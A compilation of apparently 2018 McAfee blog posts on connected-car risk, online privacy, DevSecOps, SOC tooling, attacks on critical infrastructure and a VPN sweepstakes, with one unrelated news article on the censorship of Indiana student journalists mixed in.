Vehicle-to-vehicle (V2V) technology allows communications between vehicles on the road, using a wireless network. This technology can aid security on the road by reducing a car’s speed when another vehicle is too close, for example. It can also communicate with road sign devices (vehicle to infrastructure). That transmitted information improves the driving experience as well as the security. Now imagine this vector invaded by destructive malware. If the V2V system becomes a vector, a malicious actor could create malware to infect many connected cars. This sounds like a sci-fi scenario, right? Yet it is not, if we compare this possibility with recent threats such as WannaCry or NotPetya that targeted computers with destructive malware. It is not hard to predict such a nightmare scenario.


Connected cars are taking over the roads and will radically change how we move about. By enhancing the customer experience, the automotive and the tech industries will provide exciting new services. Nonetheless, we need to consider the potential risks, with security implemented sooner rather than later. Some of the scenarios in this post are already used in the wild; others could happen sooner than we expect.


The post Today’s Connected Cars Vulnerable to Hacking, Malware appeared first on McAfee Blogs.

Indians Are Increasingly Realising Nothing Said Online Is Private

The world is becoming increasingly connected- with locks for you home controlled on your smartphone; CCTV cameras in every room that allow you to keep tabs on your home when you are out; smartphones that help you work, run and plan activities; smart TVs that allow you to connect to the internet; smart refrigerators that take stock of your grocery and place orders with the supermarket; games that can keep you glued to your screen for hours- the list is ever growing.

We all enjoy this connected lifestyle, it has made the world a global village and daily chores so much easier and faster. But there are some caveats attached. We tend to forget that in the virtual world, your safety and privacy depends a lot on you and the precautions you take. Else you end up sharing Too Much Information about yourself and your family, making you a likely candidate for ID theft and phishing.

This is exactly what a new global McAfee survey titled New Security Priorities in An Increasingly Connected World demonstrates – we are putting more personal information into the digital realm in today’s connected world. The study also reveals a disparity in concerns as Indians do not view safeguarding their connected devices (25%) as equally important as safeguarding their identity (45%) and privacy (39%).

On a positive note, 39% of Indians rank security as the most important factor when purchasing a connected home device. That’s more than one-third of the total respondents. In addition (this one is my particular favorite), 71% of the parents would be interested in a monitoring tool to supervise their kids online.

Other India-centric salient findings of the study:

  • 79% of the Indians indicate that their concern about online security has increased compared to 5 years ago. Forty-five percent rank protection of identity as top priority.
  • 39% rank security as the most important factor when purchasing a connected home device.

But though users are aware of the pitfalls of sharing too much information, they are not as proactive about their online security as they should be. The survey highlights the need for more hands-on involvement on the part of the consumer. Not only should they need to take advantage of security tools, but they also need to act responsibly online.

Do you know that if you could somehow collect all the data shared by you over the years, you might be surprised at how much you have let slip unknowingly, including facts like whether you prefer coffee to tea? A simple search or a like on a post can also reveal a lot about you and your taste and character. Worried? The thing to do is to take steps to stay safe online.

Tips to stay safe online and protect what matters most:

  • Do the little things.Cybercriminals don’t have to be great at what they do to steal your personal information. Minor tactics like changing default passwords and using a unique password can go a long way to prevent your personal information from being stolen. A password manager can help you create strong passwords and eliminate the need to remember your passwords.
  • Research before you buy.Look up products and the manufacturer before you buy internet-enabled devices. If you find a manufacturer isn’t taking security seriously, then it’s best to avoid.
  • Use identity theft protection. Consider getting an identity theft protection service to monitor use of your personally identifying information, provide insurance against financial losses and recovery tools in the event of ID theft or fraud.
  • Keep devices up to date. Update device and application software when it becomes available from the manufacturer. Many new versions of software or operating systems contain specific security updates designed to protect the user.
  • Review your account info. Regular reviews of online bank and credit account transactions can help you spot suspicious activities or purchases. If you see something suspicious report it to your financial institution and law enforcement.
  • Re-check your privacy settings. Its always important to do a quick check on privacy settings and alter them timely so that your personal data is safe and only in the hands of the few people you trust.

In an ever-changing digital world that is continually fuelled by speed, developments and complexities, your security is your responsibility too. Own your digital presence and make your digital realm a secure one.

Happy surfing!

The post Indians Are Increasingly Realising Nothing Said Online Is Private appeared first on McAfee Blogs.

Inside the fight to prevent censorship of Indiana student journalists


Plainfield High School student journalist Anu Nattam (center) holding the special edition of her school magazine the day of testifying in favor of Bill 1016

Olivia McLellan: FOX59/CBS4

After a group of student journalists in Indiana published an issue of their high school magazine last October that focused on dating and relationships, the school implemented a policy of content review prior to publication. This, some students say, amounts to censorship that is compromising their journalistic education.  

The October issue of Plainfield High School publication, the Quaker Shaker, was the magazine’s first “special topic” edition, called the Shakedown. It explored the ins and outs of relationships in high school, including polls about the prevalence of sexting as well as more serious topics like dating violence. It even won an award, which marked the first time the publication had won a national-level prize.

But parents and school administrators took issue with the content of the issue, particularly the sexting poll and use of urban dictionary definitions of words like “polyamory” and “friends with benefits.” In particular, one family member of the school board president blasted the publication on social media, encouraging people to complain to the school and school board president, and even asked why local churches were not rising up.

Now, student journalists at Plainfield need administrative approval to publish. As a result of this pushback, Plainfield High School journalism adviser Michelle Burress said that an advisory committee has been set up to evaluate every publication before it goes to press. The principal must approve anything before it is published.

To Anu Nattam, a co-editor of the publication, this policy shows that her school wants her magazine staff to act as a public relations team rather than journalists. Since the policy was implemented, she said that they were forced to change the name of their special edition issues to the Shakeout. Nattam said the school argued that the name Shakedown had mafia connotations.

“We’ve also had to change quotes, and delete quotes for trivial things that make no sense,” Nattam said. She also notes that they were asked to change the cover photo of one magazine issue because merely it showed a picture of a clothed posterior.

But it is her responsibility as a student journalist, Nattam said, to report on issues that are relevant to the student body, even if they might be controversial.

“Filtering reports and restricting ideas is not only an injustice to student journalists, but to the people reading the stories we write. Ideas and facts that impact a student body are not always going to make a school look good. Just like in real life, not everything is sunshine and rainbows.”

Nattam’s adviser Michelle Burress said that now, students are self-censoring, and worry about everything they write coming under intense scrutiny. “They are shying away from topics that normally they would not hesitate to cover because they do not want to get shot down,” she said. “More than ever this year, students are saying that they do not want to be quoted or pictured in the news magazine or yearbook.”

Ed Clere, a member of the Indiana House of Representatives, thinks this a huge problem. “Most people would have been proud to have student journalists who could produce work of that caliber,” he said of the Shakedown’s dating and relationships issue. Nothing the Plainfield High School student journalists have done or published, he said, has justified the censorship and “over the top” reaction that has ensued.

For two Indiana State Congress sessions, Clere has introduced legislation that would protect the free speech rights of student journalists across the state. It would have prohibited schools from encroaching on students’ speech rights except in very specific situations.

The bill reads: “This chapter may not be construed to authorize or protect content of school sponsored media by a student journalist that:(1) is libelous or slanderous; (2) violates federal or state law; (3) incites students to: (A) create a clear and present danger of the commission of an unlawful act; (B) violate a public school or school corporation policy; or (C) be disruptive of the operation of the public school; or (4) encourages, promotes, or supports behavior contrary to citizenship or moral instruction required under IC 20-30-5.”

House Bill 1016 was supported by many student journalists, including Anu Nattam, who testified in its favor, as well as teachers and administrators. But organizations including the Indiana School Boards Association and the Indiana Association of Public School Superintendents, fiercely opposed the bill. It died narrowly in the House on February 5, 2018.

Since a similar bill had failed the year before, Clere knew he was facing an uphill battle, but he was still surprised at the level of resistance and opposition the legislation encountered.

Clere cited a 1988 Supreme Court case that limited student publication freedom, Hazelwood School District v. Kuhlmeier, as a “big step backward” for the First Amendment rights of young journalists. “[School board superintendents and principals] like the absolute control they enjoy under Hazelwood. They don’t want to give it up.”

Indiana is far from the only state in which legislators, students, and teachers are fighting together to grant speech protections to student journalists. Clere said that efforts in Indiana are part of an initiative by the Student Press Law Center—a network, called New Voices, of state campaigns to pass such legislation.

Some states, including California, Montana, and Illinois, have successfully enacted New Voices legislation like Clere’s Bill 1016. But most states have not.

In Indiana, Clere isn’t giving up. Assuming he is re-elected, he vowed that he would “keep trying, and keep bringing this legislation back as long as I am able.” While he is open to discussion and addressing some of the concerns of school administrators, he said he is not open to watering down the bill to the point where it is meaningless.

“This is about more than journalism education and student publications,” Clere said. “Censorship of student journalists hurts entire school communities. It deprives them of the important and relevant stories and conversations that benefit all students.”

Nattam agrees. “People need to realize that by limiting press freedom for students, they are limiting their education. That’s what I feel like was done to me and my staff—our education was compromised, because we can’t be put in the same environment as a professional journalist. So, we can’t prepare for a career in journalism if that's what we choose to do.”

“If anything, this whole thing has fueled my passion for journalism,” Nattam said. “The press is how the public stays informed.”

DevSecOps Beyond the Myths: Cutting Through the Hype and Getting to Results

There’s been a lot of talk and buzz about DevOps and DevSecOps, precipitated by mega technology trends and cybersecurity events shaping our industry. So my colleagues and I were excited to be part of a recent Virtual Summit on “Assembling the Pieces of the DevSecOps Puzzle,” which aimed to move the conversation from defining DevSecOps to enacting it. We are spending a lot of time helping our customers make this shift, so we were thrilled to be able to share our experiences and best practices with you. The Virtual Summit contained a series of sessions on topics such as: tweaking your application security policies in a DevOps world, the changing role of the security professional in a DevOps world, and how to get your developers the security training they need. I encourage you to look at the lineup and take advantage of some of these practical and valuable sessions.

I was lucky enough to kick off the Virtual Summit with a keynote address and answer some of the audience’s early questions. In my keynote, I talked about how DevOps is becoming a necessity in today’s application economy. In a world run by software, it’s critical to develop and release new features continuously, which is where DevOps comes in. DevOps empowers development teams with an iterative process, allowing for continuous deployment of software and introduction of new features at a rapid pace. But many have raised concerns about how security fits into this fast-paced, iterative landscape. Doesn’t continuous deployment just mean continuous opportunities to introduce vulnerabilities? That doesn’t have to be the case if we move to a DevSecOps model, where security is integrated into the DevOps process and which actually gives us the opportunity to create better security.

But, ultimately, this is a big change that affects the culture, processes, technologies and priorities of many teams in an organization, and no change of this magnitude comes without some stumbling blocks. But we’ve seen it work – and seen how “secure” can become part of “quality” software.

I talk about some of these stumbling blocks in my keynote, debunk some of the popular myths surrounding DevSecOps and provide practical recommendations on how to get this done in your organization. I also talk about the enablers for success you’ll need to have in place to avoid making these myths a reality. These enablers include the security team’s openness to this new model, developer security training, and the right security tools. Finally, you’ll hear me answer some excellent viewer questions in my keynote, including:

Will security champions on the development team replace the security team?

Are certain industries more resistant to DevOps?

If security is shifting left, and development is doing the security testing – what does that look like?

You can get my thoughts on these questions in the full recording of my keynote. And if you’re moving toward DevSecOps, or just in the planning stages, please check out some of my colleagues’ excellent sessions from this summit that are packed with tips and advice on making DevSecOps a reality.

Is Your SOC Caught in the Slow Lane?

Everybody’s got a device. And the data on that device is moving into the public cloud. Massive amounts of data.  In a world of massive amounts of data, who’s the traffic cop? The Security Operation Center (SOC).

But these days the daily flow of data traffic resembles a Formula One race car going full out, and some traffic monitors are a single cop on the beat.

Research shows this analogy is not far off: 25% of security events go unanalyzed. And 39% of cybersecurity organizations manually collect, process, and analyze external intelligence feeds.

Think about this. At the dawn of the Digital Century, more than a third of all companies are approaching cybersecurity manually.

This is not sustainable.

In short, there are simply not enough people to keep up with the security challenges. But it’s not a question of training or hiring more people. The idea is for humans to do less and machines to do more. Automating threat defense has many advantages: speed, the ability to learn, and the ability to collaborate with other solutions. Integration of data, analytics, and machine learning are the foundations of the advanced SOC.

For about a year now McAfee engineers have been developing a new architecture for an existing SIEM tool called McAfee© Enterprise Security Manager version 11 (“McAfee ESM 11”), which can serve as the foundation of a modern SOC.

As cybercriminals get smarter, the need for SOC operations to evolve becomes more important. McAfee ESM 11 can help customers transition their SOC from silos of isolated data and manual investigations to faster operations based on machine learning and behavioral analytics.

What makes ESM 11 different from other SIEM tools is its flexible architecture and scalability.

The open and scalable data bus architecture at the heart of McAfee ESM 11 shares huge volumes of raw, parsed and correlated events to allow threat hunters to easily search recent events, while reliably retaining and storing data for compliance and forensics.

The scalability of McAfee ESM 11 architecture allows for flexible horizontal expansion with high availability, giving organizations the ability to rapidly query billions of events. Additional McAfee ESM appliances or virtual machines can be added at any point to add ingestion, query performance, and redundancy.

ESM 11 also includes the ability to partner. An extensible and distributed design integrates with more than three dozen partners, hundreds of standardized data sources, and industry threat intelligence.

By deploying advanced analytics to quickly elevate key insights and context, analysts and members of a security team tasked with examining cyberthreats can focus their attention on high-value next tasks, like understanding a threat’s impact across the organization and what’s needed to respond.

This human-machine teaming, enabled by McAfee’s new and enhanced security operations solutions like McAfee Investigator, McAfee Behavioral Analytics, and McAfee Advanced Threat Defense, allows organizations to more efficiently collect, enrich and share data, turn security events into actionable insights and act to confidently detect and correct sophisticated threats faster. The strategy was outlined in my last SOC blog.

We’ve been testing these products together at the new McAfee Security Fusion Centers, located in Plano, Texas and Cork, Ireland. These facilities were built last year and are designed to support full visibility and global management of risks, in a simulated environment. The Security Fusion Centers give customers a blueprint for building out their own SOCs.

In short – we are revving up the SOC: critical facts in minutes, not hours. Highly-tuned appliances to collect, process, and correlate log events from multiple years with other data streams, including STIX-based threat intelligence feeds. And the storage of billions of events and flows, with quick access long-term event data storage to investigate attacks.

Let your security travel as fast as your data. And get your SOC out of the slow lane.

The post Is Your SOC Caught in the Slow Lane? appeared first on McAfee Blogs.

Separating the Signal from Noise

In security operations, we frequently talk about the difficulties in separating the signal from the noise to detect legitimate threats and disregard false alarms. Data overload is a common problem and triage becomes a critical skill to hone and develop.

As the chief information security officer (CISO) for McAfee, I am aware at multiple levels of the risks that come from a failure to focus on the right thing. If one of our security operations center (SOC) analysts fails to notice multiple login attempts by the same user from different countries in a short span of time, it could cost us both valuable company data and our reputation in the industry.

For these reasons, McAfee announced major enhancements today to our security operations portfolio in our security information and event management (SIEM) and Security Analytics product lines – enhancements that the McAfee Information Security team I am proud to lead helped to road-test. We also announced that our state-of-the-art converged physical and cyber Security Fusion Centers are now fully operational in Plano, Texas, USA and Cork, Ireland – less than a year after we emerged from Intel as a standalone company.

The big deal for the McAfee Security Fusion Centers is that they have a dual mission: 1) to protect McAfee, and; 2) help us build better products. And for myself, I would add a third objective: help our customers to learn from our experiences protecting McAfee. We want to help them build better reference architectures, learn how to communicate with boards of directors and become more innovative in solving cybersecurity problems.

For Job 1, protect the enterprise, we believe in the primacy of fundamentals. We use the National Institute of Standards and Technology (NIST) cybersecurity framework, as well as the Factor Analysis of Information Risk (FAIR) method to quantify our risk posture, and continually manage for the framework’s core functions of Identify, Protect, Detect, Respond, and Recover. It’s critical that we understand what is happening in our environment and that is why we chose to converge our physical and cybersecurity functions into one operations center – a Security Fusion Center. We need to collect data across all aspects of our operating environment. Without that ability, we are flying blind.

Next, we focus on being able to answer a series of vital questions that help us complete the identification functions. We ask:

  1. What is on the network and how are our networks accessible? We must be able to identify our assets. That visibility into what is connected to us is critical. We use tools like Rapid7 Nexpose, McAfee Rogue System Detection, and network access control (NAC) to constantly monitor the network to tell us what is connected to us.
  2. How are we managing access to vital systems and stores of data? We decided from the beginning that we could not take access to information assets for granted. At McAfee, there is no implicit right of access – only explicit privilege. In this age of bring-your-own-device (BYOD), we have set up two-factor authentication when accessing the McAfee network. If your role requires access to sensitive information, “need to know” access is applied, and the employees must and comply with other access control mechanisms like separation of duties, least privilege, and information management.
  3. Where are the vulnerabilities? We need to evaluate risk across our environment from device to cloud. This means more than just audits and vulnerability management. We had to design our systems so that they would be scalable and support our incident response functions like patch management and counter measures in a prioritized manner. We especially rely on McAfee ePO for visibility across on- and off-premises devices.
  4. How is the data protected? This is a matter of understanding where are the crown jewels of our data and what are the risks for exfiltration. It’s vital to set up policies in a very prioritized and strategic manner. Data loss prevention requires thinking through the data, the applications and the users.
  5. How are we doing against the basics? While it is great to have next generation toolsets, it is often the basics that most organizations miss that cause compromises. For example, we are constantly focused on basics like security architecture, access and authentication control, device configuration and baselines, operating system and third-party patch levels, security awareness training, and table-top exercises.  Even at McAfee with the entire product portfolio, we are diligent about instilling the basics across our security operations.
  6. Finally, what signals do we focus on? We need context and insight to answer this. This requires a place where all the data can be collected, enriched and shared. We have been using McAfee Enterprise Security Manager 11.0, which was announced today, for some time now. The open data bus architecture enables our SIEM to ingest a high volume of data, scaling to billions of events, and then enrich that raw data nearly immediately, turning noise into insights. We also appreciate that this architecture allows the SIEM to intelligently share data to any appropriate appliance, application, or data store. This is an evolved security operations infrastructure – it’s a mix of a SIEM platform with User Entity Behavior Analytics (UEBA) and threat investigation, using McAee Behavioral Analytics (MBA) and McAfee Investigator. Our Security Fusion Centers are the first places where all those pieces will be present and working together.

As for Job #2, helping McAfee build better products, by now you can see how we are living out a commitment to be Customer Zero for McAfee. Going forward, we are going to be the first organization to use McAfee’s new products. But we are doing that in a way that will help our customers implement better, faster and more smoothly before they have even seen the product. We’re working out the bugs and we’re working on feature requests with our Product Management and Engineering teams.

This helps us to be better, more innovative, and to solve cybersecurity challenges. It is meant to be a very tight collaboration – a place to try out our products in the real-world. We’re going to get there through collaboration.  From our learnings in the first year, we have observed that diversity is the single most important factor in developing a world class organization.  Diversity of thought challenges typical thinking and results in better outcomes.

In fact, collaboration is personally my number one thing. I wanted to work with the smartest people in the world. I will acknowledge that I am not the smartest person in the room. Somebody is going to know more about security than I do. Embracing that and bringing that all together will make us all stronger and better at our jobs. And that is what we mean when we say, “Together is Power.”

As for my personal third goal, helping all of you to be better, too, that’s why I’m sharing here. We’ll continue this dialogue about how McAfee is protecting itself and, in the process, learning more about helping you with another blog post soon. I’ll be sharing the byline with my colleague, Jason Rolleston, Vice President for Security Intelligence & Analytics.

Let me know what signals you are focused on and how we can help solve problems together.

You can look for Grant Bourzikas on Twitter and LinkedIn and at security events like MPOWER, Blackhat, and RSA.

McAfee technologies’ features and benefits depend on system configuration and may require enabled hardware, software, or service activation. Learn more at No computer system can be absolutely secure.


The post Separating the Signal from Noise appeared first on McAfee Blogs.

Critical Infrastructure Under Attack

Security researchers have long shared their concerns about potential cyberattacks on critical infrastructure systems. Over the past few weeks, there have been several reports highlighting the dangers of such attacks. According to the New York Times, investigators believe that a cyberattack against a petrochemical plant in Saudi Arabia in August last year was intended to not only sabotage the plant’s operations but also cause an explosion that could have killed people. The only thing that reportedly prevented the explosion was a mistake in the computer code used by the attackers. Experts believe that a nation-state attacker was responsible, given that there was no obvious financial motivation from the attack. Also this month, the US accused Russia of a wide-ranging cyber-assault on its energy grid and other parts of its critical infrastructure, with many of the reported tactics resembling the Dragonfly 2.0 campaign, in which hackers infiltrated energy facilities in North America and Europe.

We are at an alarming point in terms of our critical infrastructure security, where governments around the world are on high alert to the potential for damaging attacks. The head of the UK’s National Cyber Security Centre (NCSC) warned in January that he expects the UK to suffer a major, crippling cyberattack against its national critical infrastructure during the next two years.

Nation state attackers are well aware of the political fallout that could arise as a result of dangerous cyberattacks on control networks, and so it is imperative that security issues within these systems are addressed urgently.

Industrial control systems at risk

The National Cyber Security Centre is right to be concerned about potential cyberattacks against UK critical infrastructure. Across all parts of critical national infrastructure, we are seeing a greater number of sophisticated and damaging cyber threats which are often believed to be the work of foreign governments seeking, it is alleged, to cause everything from mischief through to political upheaval. While offering many benefits in terms of productivity and visibility, the greater connectivity arising from the Internet of Things has also exposed many industrial control systems to a range of damaging cyberattacks. For example, DDoS attacks can be used to disrupt the availability of critical services, while simultaneously allowing attackers to plant damaging, or as in the Saudi case even weaponized, malware. Last October’s DDoS attacks against the transport network in Sweden caused train delays and disrupted travel services, while the WannaCry ransomware attacks last May demonstrated the capacity for cyberattacks to impact people’s access to essential services. The current cyber security landscape has changed almost beyond recognition – ten years ago, only the most Orwellian futurists would have predicted that major national elections would be manipulated by cyberattacks.

What’s next?

The pressure is now on for the cyber security community and governments to act on this issue to defend against this apparent increase in nation state attacks. The NIS Directive with the UK/EU and the NIST framework in the US present a golden opportunity to improve critical infrastructure cyber security. But to be truly effective, these regulations must compel operators of essential services to deliver higher levels of cyber security and require that these essential services remain available during an attack. As seen in recent days with Facebook and Cambridge Analytica, it won’t matter if infrastructure operators claim ‘tick-box’ regulatory compliance as their defence if their essential service has failed to remain open for business during a nation state sponsored cyber-attack.

To find out more, contact us.

McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards®

On February 28th, Info Security Products Guide Global Excellence Awards presented their 2018 award winners. We are humbled to have received two golds in the Product or Service Excellence of the Year — Security Information and Website & Web Application Security for McAfee Safe Connect.

Product Overview:

McAfee Safe Connect is a VPN (Virtual Private Network) that helps users create secure online connections while using the internet.  Doing so helps our customers minimize their individual security risks and helps keep their data private – especially when connecting to a public or open Wi-Fi network. Unlike home Wi-Fi, many public Wi-Fi networks (commonly offered at cafés, airports and hotels) aren’t password-protected and don’t encrypt the user data being transmitted through. Therefore, when you connect to a hotspot, your online activities from your social media activity to your online purchase history and even your bank account credentials may be wide open to hackers. With McAfee Safe Connect, you can rest assured that your information and online activities are encrypted.

McAfee has a proven record of providing security for consumers in the digital age. To address growing concerns over Wi-Fi security, we created an award-winning VPN that would keep users’ personal information secure from online threats and unsecure networks.

McAfee Safe Connect has over 1 million downloads across Google Play and the App Store with an impressive 4.3-star rating. It is available in over 20 languages to users worldwide.

Tech behemoth Samsung also chose McAfee Safe Connect VPN for their Galaxy Note 8 – Secure Wi-Fi feature and expanded collaboration with its newly announced Galaxy S9 Smartphones.

About Info Security PG’s Global Excellence Awards

Info Security Products Guide sponsors the Global Excellence Awards and plays a vital role in keeping individuals informed of the choices they can make when it comes to protecting their digital resources and assets. The guide is written expressly for those who wish to stay informed about recent security threats and the preventive measure they can take. You will discover a wealth of information in this guide including tomorrow’s technology today, best deployment scenarios, people and technologies shaping cyber security and industry predictions & directions that facilitate in making the most pertinent security decisions. Visit for the complete list of winners.

We are proud of recognition given to McAfee Safe Connect, which aims to safeguard every Internet user’s online privacy. Please check out our award-winning Wi-Fi Privacy VPN product: McAfee Safe Connect.

Interested in learning more about McAfee Safe Connect and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards® appeared first on McAfee Blogs.

McAfee Safe Connect RT2Win Sweepstakes Terms and Conditions

Just a few weeks back, Info Security Products Guide awarded McAfee Safe Connect with two Gold-Level Global Excellence Awards for Product or Service Excellence of the YearSecurity Information and Website & Web Application Security!

To celebrate, we’re treating you to a #RT2Win Sweepstakes on the @McAfee_Home Twitter handle. Ten [10] lucky winners of the Sweepstakes drawing will receive a one-year free subscription of McAfee Safe Connect to provide security and privacy across your PC, iOS, and Android devices when connecting to Wi-Fi hotspots and private networks.

All you have to do is simply retweet one of our contest tweets between March 26, 2018 – April 17, 2018 for your chance to win. Sweepstake tweets will include “#McAfeeSafeConnect, #RT2Win, and #Sweepstakes”. Terms and conditions below.

#McAfeeSafeConnect #RT2Win Sweepstakes Official Rules

  • To enter, go to, and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Monday, March 26. This tweet will include the hashtags: #McAfeeSafeConnect, #RT2Win, and #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #McAfeeSafeConnect AND #RT2Win hashtags must be included to be entered.
  • Winners will be notified on Wednesday, April 18, 2018 via Twitter direct message.
  • Limit one entry per person.

How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#RT2Win, #Sweepstakes, and #McAfeeSafeConnect” for a chance to win a one-year free subscription to McAfee Safe Connect. Ten [10] total winners will be selected and announced on April 18, 2018. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

McAfee Safe Connect #RT2Win Sweepstakes Terms and Conditions

How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Safe Connect #RT2Win Sweepstakes will be conducted from March 26, 2018 through April 17, 2018. All entries for each day of the McAfee Safe Connect #RT2Win Sweepstakes must be received during the time allotted for the McAfee Safe Connect #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Safe Connect #RT2Win Sweepstakes. The McAfee Safe Connect #RT2Win Sweepstakes duration is as follows.

McAfee Safe Connect #RT2Win Sweepstakes Duration:

  • Begins Monday, March 26, 2018­­ at 12:00pm PST
  • Ends: Tuesday, April 17, 2018 at 12:00am PST
  • Ten [10] winners will be announced: Wednesday, April 18th

For the McAfee Safe Connect #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Safe Connect #RT2Win Sweepstakes:

  1. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #RT2Win, #Sweepstakes, and #McAfeeSafeConnect.
  2. Retweet the sweepstakes tweet of the day and make sure it includes the #RT2Win, #Sweepstakes, and #McAfeeSafeConnect hashtags.
  3. Note: Tweets that do not contain the #RT2Win, #Sweepstakes, and #McAfeeSafeConnect hashtags will not be considered for entry.
  4. Limit one entry per person.

Ten [10] winners will be chosen for the McAfee Safe Connect #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #RT2Win, #Sweepstakes, #McAfeeSafeConnect. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on April 18, 2018 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.   


McAfee Safe Connect #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the dates of the McAfee Safe Connect #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and McAfee Safe Connect #RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Safe Connect #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of ten [10] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Safe Connect #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: 

Each winner will be notified via direct message (“DM”) on by April 18th. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten [10] days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty-four [24] hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.


The prize for the McAfee Safe Connect #RT2Win Sweepstakes is a one-year free subscription to McAfee Safe Connect. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Safe Connect #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Safe Connect #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Safe Connect #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Safe Connect #RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Safe Connect #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Safe Connect #RT2Win Sweepstakes-related activity, or participation in the McAfee Safe Connect #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize McAfee Safe Connect #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Safe Connect #RT2Win Sweepstakes.

Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Safe Connect #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Safe Connect #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with these sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy: 

Personal information obtained in connection with this prize McAfee Safe Connect #RT2Win Sweepstakes will be handled in accordance policy set forth at

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after March 26th 2018 and before April 17th 2018 to the address listed below, Attn: #RT2Win at CES Sweepstakes.  To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
